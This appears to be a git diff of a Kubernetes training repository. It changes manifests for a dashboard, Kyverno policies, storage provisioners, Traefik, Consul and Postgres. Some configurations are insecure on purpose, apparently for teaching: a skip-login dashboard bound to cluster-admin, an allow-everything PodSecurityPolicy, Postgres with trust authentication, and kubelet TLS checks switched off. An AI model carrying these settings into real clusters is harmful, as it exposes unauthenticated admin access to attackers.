subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1beta2
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard

View File

@@ -1,28 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
number: 80
path: /
pathType: Prefix

View File

@@ -1,32 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,37 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
context:
- name: configmap
configMap:
name: ingress-domain-name
namespace: "{{request.object.metadata.namespace}}"
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.{{configmap.data.domain}}"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,63 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: setup-namespace
spec:
rules:
- name: setup-limitrange
match:
resources:
kinds:
- Namespace
generate:
kind: LimitRange
name: default-limitrange
namespace: "{{request.object.metadata.name}}"
data:
spec:
limits:
- type: Container
min:
cpu: 0.1
memory: 0.1
max:
cpu: 2
memory: 2Gi
default:
cpu: 0.25
memory: 500Mi
defaultRequest:
cpu: 0.25
memory: 250Mi
- name: setup-resourcequota
match:
resources:
kinds:
- Namespace
generate:
kind: ResourceQuota
name: default-resourcequota
namespace: "{{request.object.metadata.name}}"
data:
spec:
hard:
requests.cpu: "10"
requests.memory: 10Gi
limits.cpu: "20"
limits.memory: 20Gi
- name: setup-networkpolicy
match:
resources:
kinds:
- Namespace
generate:
kind: NetworkPolicy
name: default-networkpolicy
namespace: "{{request.object.metadata.name}}"
data:
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}

View File

@@ -1,22 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-1
spec:
validationFailureAction: enforce
rules:
- name: ensure-pod-color-is-valid
match:
resources:
kinds:
- Pod
selector:
matchExpressions:
- key: color
operator: Exists
- key: color
operator: NotIn
values: [ red, green, blue ]
validate:
message: "If it exists, the label color must be red, green, or blue."
deny: {}

View File

@@ -1,31 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-2
spec:
validationFailureAction: enforce
background: false
rules:
- name: prevent-color-change
match:
resources:
kinds:
- Pod
preconditions:
- key: "{{ request.operation }}"
operator: Equals
value: UPDATE
- key: "{{ request.oldObject.metadata.labels.color }}"
operator: NotEquals
value: ""
- key: "{{ request.object.metadata.labels.color }}"
operator: NotEquals
value: ""
validate:
message: "Once label color has been added, it cannot be changed."
deny:
conditions:
- key: "{{ request.object.metadata.labels.color }}"
operator: NotEquals
value: "{{ request.oldObject.metadata.labels.color }}"

View File

@@ -1,28 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: pod-color-policy-3
spec:
validationFailureAction: enforce
background: false
rules:
- name: prevent-color-change
match:
resources:
kinds:
- Pod
preconditions:
- key: "{{ request.operation }}"
operator: Equals
value: UPDATE
- key: "{{ request.oldObject.metadata.labels.color }}"
operator: NotEquals
value: ""
- key: "{{ request.object.metadata.labels.color }}"
operator: Equals
value: ""
validate:
message: "Once label color has been added, it cannot be removed."
deny:
conditions:

View File

@@ -1,46 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: tls-for-ingress
spec:
rules:
- name: create-role
match:
resources:
kinds:
- Certificate
generate:
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
rules:
- verbs:
- get
apiGroups:
- ""
resources:
- secrets
resourceNames:
- "{{request.object.metadata.name}}"
- name: create-rolebinding
match:
resources:
kinds:
- Certificate
generate:
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: "{{request.object.metadata.name}}"
subjects:
- kind: ServiceAccount
name: default
namespace: "{{request.object.metadata.namespace}}"

View File

@@ -1,160 +0,0 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
apiVersion: v1
kind: Namespace
metadata:
name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: local-path-provisioner-role
rules:
- apiGroups: [ "" ]
resources: [ "nodes", "persistentvolumeclaims", "configmaps" ]
verbs: [ "get", "list", "watch" ]
- apiGroups: [ "" ]
resources: [ "endpoints", "persistentvolumes", "pods" ]
verbs: [ "*" ]
- apiGroups: [ "" ]
resources: [ "events" ]
verbs: [ "create", "patch" ]
- apiGroups: [ "storage.k8s.io" ]
resources: [ "storageclasses" ]
verbs: [ "get", "list", "watch" ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: local-path-provisioner-bind
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: local-path-provisioner
namespace: local-path-storage
spec:
replicas: 1
selector:
matchLabels:
app: local-path-provisioner
template:
metadata:
labels:
app: local-path-provisioner
spec:
serviceAccountName: local-path-provisioner-service-account
containers:
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.19
imagePullPolicy: IfNotPresent
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
volumes:
- name: config-volume
configMap:
name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
name: local-path-config
namespace: local-path-storage
data:
config.json: |-
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}
setup: |-
#!/bin/sh
while getopts "m:s:p:" opt
do
case $opt in
p)
absolutePath=$OPTARG
;;
s)
sizeInBytes=$OPTARG
;;
m)
volMode=$OPTARG
;;
esac
done
mkdir -m 0777 -p ${absolutePath}
teardown: |-
#!/bin/sh
while getopts "m:s:p:" opt
do
case $opt in
p)
absolutePath=$OPTARG
;;
s)
sizeInBytes=$OPTARG
;;
m)
volMode=$OPTARG
;;
esac
done
rm -rf ${absolutePath}
helperPod.yaml: |-
apiVersion: v1
kind: Pod
metadata:
name: helper-pod
spec:
containers:
- name: helper-pod
image: busybox

View File

@@ -1,193 +0,0 @@
# This file is https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml
# But with the following arguments added to metrics-server:
# args:
# - --kubelet-insecure-tls
# - --metric-resolution=5s
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: metrics-server
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
k8s-app: metrics-server
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-view: "true"
name: system:aggregated-metrics-reader
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
k8s-app: metrics-server
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
- namespaces
- configmaps
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
labels:
k8s-app: metrics-server
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
k8s-app: metrics-server
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
k8s-app: metrics-server
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: v1
kind: Service
metadata:
labels:
k8s-app: metrics-server
name: metrics-server
namespace: kube-system
spec:
ports:
- name: https
port: 443
protocol: TCP
targetPort: https
selector:
k8s-app: metrics-server
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
k8s-app: metrics-server
name: metrics-server
namespace: kube-system
spec:
selector:
matchLabels:
k8s-app: metrics-server
strategy:
rollingUpdate:
maxUnavailable: 0
template:
metadata:
labels:
k8s-app: metrics-server
spec:
containers:
- args:
- --cert-dir=/tmp
- --secure-port=4443
- --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
- --kubelet-use-node-status-port
- --kubelet-insecure-tls
- --metric-resolution=5s
image: k8s.gcr.io/metrics-server/metrics-server:v0.4.3
imagePullPolicy: IfNotPresent
livenessProbe:
failureThreshold: 3
httpGet:
path: /livez
port: https
scheme: HTTPS
periodSeconds: 10
name: metrics-server
ports:
- containerPort: 4443
name: https
protocol: TCP
readinessProbe:
failureThreshold: 3
httpGet:
path: /readyz
port: https
scheme: HTTPS
periodSeconds: 10
securityContext:
readOnlyRootFilesystem: true
runAsNonRoot: true
runAsUser: 1000
volumeMounts:
- mountPath: /tmp
name: tmp-dir
nodeSelector:
kubernetes.io/os: linux
priorityClassName: system-cluster-critical
serviceAccountName: metrics-server
volumes:
- emptyDir: {}
name: tmp-dir
---
apiVersion: apiregistration.k8s.io/v1
kind: APIService
metadata:
labels:
k8s-app: metrics-server
name: v1beta1.metrics.k8s.io
spec:
group: metrics.k8s.io
groupPriorityMinimum: 100
insecureSkipTLSVerify: true
service:
name: metrics-server
namespace: kube-system
version: v1beta1
versionPriority: 100

View File

@@ -1,20 +0,0 @@
kind: Pod
apiVersion: v1
metadata:
generateName: mounter-
labels:
container.training/mounter: ""
spec:
volumes:
- name: pvc
persistentVolumeClaim:
claimName: my-pvc-XYZ45
containers:
- name: mounter
image: alpine
stdin: true
tty: true
volumeMounts:
- name: pvc
mountPath: /pvc
workingDir: /pvc

View File

@@ -3,7 +3,8 @@ apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector: {}
podSelector:
matchLabels:
ingress:
- from:
- podSelector: {}

View File

@@ -1,8 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-without-volume
spec:
containers:
- name: nginx
image: nginx

View File

@@ -1,13 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-volume
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/

View File

@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-git
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
- name: git
image: alpine
command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/
restartPolicy: OnFailure

View File

@@ -1,7 +1,7 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-init
name: nginx-with-volume
spec:
volumes:
- name: www
@@ -11,10 +11,11 @@ spec:
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
initContainers:
- name: git
image: alpine
command: [ "sh", "-c", "apk add git && sleep 5 && git clone https://github.com/octocat/Spoon-Knife /www" ]
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/
restartPolicy: OnFailure

View File

@@ -1,24 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: openebs-local-hostpath-pod
spec:
volumes:
- name: storage
persistentVolumeClaim:
claimName: local-hostpath-pvc
containers:
- name: better
image: alpine
command:
- sh
- -c
- |
while true; do
echo "$(date) [$(hostname)] Kubernetes is better with PVs." >> /mnt/storage/greet.txt
sleep $(($RANDOM % 5 + 20))
done
volumeMounts:
- mountPath: /mnt/storage
name: storage

View File

@@ -1,98 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: persistentconsul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: persistentconsul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: persistentconsul
subjects:
- kind: ServiceAccount
name: persistentconsul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: persistentconsul
---
apiVersion: v1
kind: Service
metadata:
name: persistentconsul
spec:
ports:
- port: 8500
name: http
selector:
app: persistentconsul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: persistentconsul
spec:
serviceName: persistentconsul
replicas: 3
selector:
matchLabels:
app: persistentconsul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: persistentconsul
spec:
serviceAccountName: persistentconsul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- persistentconsul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.6"
volumeMounts:
- name: data
mountPath: /consul/data
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

File diff suppressed because it is too large Load Diff

View File

@@ -12,20 +12,10 @@ spec:
labels:
app: postgres
spec:
#schedulerName: stork
initContainers:
- name: rmdir
image: alpine
volumeMounts:
- mountPath: /vol
name: postgres
command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
schedulerName: stork
containers:
- name: postgres
image: postgres:12
env:
- name: POSTGRES_HOST_AUTH_METHOD
value: trust
image: postgres:10.5
volumeMounts:
- mountPath: /var/lib/postgresql/data
name: postgres

View File

@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: privileged
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:privileged
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['privileged']

View File

@@ -1,38 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
annotations:
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
seccomp.security.alpha.kubernetes.io/allowedProfileNames: runtime/default
seccomp.security.alpha.kubernetes.io/defaultProfileName: runtime/default
name: restricted
spec:
allowPrivilegeEscalation: false
fsGroup:
rule: RunAsAny
runAsUser:
rule: RunAsAny
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
volumes:
- configMap
- emptyDir
- projected
- secret
- downwardAPI
- persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:restricted
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['restricted']

View File

@@ -1,20 +0,0 @@
kind: PersistentVolume
apiVersion: v1
metadata:
generateName: my-pv-
labels:
container.training/pv: ""
spec:
accessModes:
- ReadWriteOnce
- ReadWriteMany
capacity:
storage: 1G
hostPath:
path: /tmp/my-pv
#storageClassName: my-sc
#claimRef:
# kind: PersistentVolumeClaim
# apiVersion: v1
# namespace: default
# name: my-pvc-XYZ45

View File

@@ -1,13 +0,0 @@
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
generateName: my-pvc-
labels:
container.training/pvc: ""
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1G
#storageClassName: my-sc

View File

@@ -1,147 +0,0 @@
---
apiVersion: v1
kind: Namespace
metadata:
name: blue
labels:
app: rainbow
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rainbow
color: blue
name: color
namespace: blue
spec:
selector:
matchLabels:
app: rainbow
color: blue
template:
metadata:
labels:
app: rainbow
color: blue
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rainbow
color: blue
name: color
namespace: blue
spec:
ports:
- name: http
port: 80
protocol: TCP
targetPort: 80
selector:
app: rainbow
color: blue
type: ClusterIP
---
apiVersion: v1
kind: Namespace
metadata:
name: green
labels:
app: rainbow
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rainbow
color: green
name: color
namespace: green
spec:
selector:
matchLabels:
app: rainbow
color: green
template:
metadata:
labels:
app: rainbow
color: green
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rainbow
color: green
name: color
namespace: green
spec:
ports:
- name: http
port: 80
protocol: TCP
targetPort: 80
selector:
app: rainbow
color: green
type: ClusterIP
---
apiVersion: v1
kind: Namespace
metadata:
name: red
labels:
app: rainbow
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rainbow
color: red
name: color
namespace: red
spec:
selector:
matchLabels:
app: rainbow
color: red
template:
metadata:
labels:
app: rainbow
color: red
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rainbow
color: red
name: color
namespace: red
spec:
ports:
- name: http
port: 80
protocol: TCP
targetPort: 80
selector:
app: rainbow
color: red
type: ClusterIP

View File

@@ -1,17 +1,28 @@
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "2"
creationTimestamp: null
generation: 1
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
spec:
replicas: 1
selector:
matchLabels:
app: socat
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: socat
spec:
@@ -23,19 +34,34 @@ spec:
image: alpine
imagePullPolicy: Always
name: socat
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
status: {}
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /api/v1/namespaces/kube-system/services/socat
spec:
externalTrafficPolicy: Cluster
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: socat
sessionAffinity: None
type: NodePort
status:
loadBalancer: {}

View File

@@ -1,42 +0,0 @@
---
apiVersion: v1
kind: Namespace
metadata:
name: tilt-registry
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: tilt-registry
name: tilt-registry
namespace: tilt-registry
spec:
selector:
matchLabels:
app: tilt-registry
template:
metadata:
labels:
app: tilt-registry
spec:
containers:
- image: registry
name: registry
---
apiVersion: v1
kind: Service
metadata:
labels:
app: tilt-registry
name: tilt-registry
namespace: tilt-registry
spec:
ports:
- port: 5000
protocol: TCP
targetPort: 5000
nodePort: 30555
selector:
app: tilt-registry
type: NodePort

View File

@@ -1,87 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
selector:
matchLabels:
k8s-app: traefik-ingress-lb
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik:1.7
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --api
- --kubernetes
- --logLevel=INFO
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system

View File

@@ -1,114 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
selector:
matchLabels:
k8s-app: traefik-ingress-lb
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik:v2.5
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: https
containerPort: 443
hostPort: 443
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --accesslog
- --api
- --api.insecure
- --log.level=INFO
- --metrics.prometheus
- --providers.kubernetesingress
- --entrypoints.http.Address=:80
- --entrypoints.https.Address=:443
- --entrypoints.https.http.tls.certResolver=default
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
- apiGroups:
- networking.k8s.io
resources:
- ingresses
- ingressclasses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system
---
kind: IngressClass
apiVersion: networking.k8s.io/v1
metadata:
name: traefik
annotations:
ingressclass.kubernetes.io/is-default-class: "true"
spec:
controller: traefik.io/ingress-controller

View File

@@ -1 +0,0 @@
traefik-v2.yaml

100
k8s/traefik.yaml Normal file
View File

@@ -0,0 +1,100 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: extensions/v1beta1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --api
- --kubernetes
- --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
name: traefik-ingress-service
namespace: kube-system
spec:
selector:
k8s-app: traefik-ingress-lb
ports:
- protocol: TCP
port: 80
name: web
- protocol: TCP
port: 8080
name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system

View File

@@ -1,62 +0,0 @@
#!/bin/sh
banner() {
echo "# This file was generated with the script $0."
echo "#"
}
namespace() {
# 'helm template --namespace ... --create-namespace'
# doesn't create the namespace, so we need to create it.
echo ---
kubectl create namespace kubernetes-dashboard \
-o yaml --dry-run=client
echo ---
}
(
banner
namespace
helm template kubernetes-dashboard kubernetes-dashboard \
--repo https://kubernetes.github.io/dashboard/ \
--create-namespace --namespace kubernetes-dashboard \
--set "extraArgs={--enable-skip-login,--enable-insecure-login}" \
--set protocolHttp=true \
--set service.type=NodePort \
#
echo ---
kubectl create clusterrolebinding kubernetes-dashboard:insecure \
--clusterrole=cluster-admin \
--serviceaccount=kubernetes-dashboard:kubernetes-dashboard \
-o yaml --dry-run=client \
#
) > dashboard-insecure.yaml
(
banner
namespace
helm template kubernetes-dashboard kubernetes-dashboard \
--repo https://kubernetes.github.io/dashboard/ \
--create-namespace --namespace kubernetes-dashboard \
#
) > dashboard-recommended.yaml
(
banner
namespace
helm template kubernetes-dashboard kubernetes-dashboard \
--repo https://kubernetes.github.io/dashboard/ \
--create-namespace --namespace kubernetes-dashboard \
--set service.type=NodePort \
#
echo ---
kubectl create clusterrolebinding kubernetes-dashboard:cluster-admin \
--clusterrole=cluster-admin \
--serviceaccount=kubernetes-dashboard:cluster-admin \
-o yaml --dry-run=client \
#
echo ---
kubectl create serviceaccount -n kubernetes-dashboard cluster-admin \
-o yaml --dry-run=client \
#
) > dashboard-with-token.yaml

View File

@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jean.doe
namespace: users
---
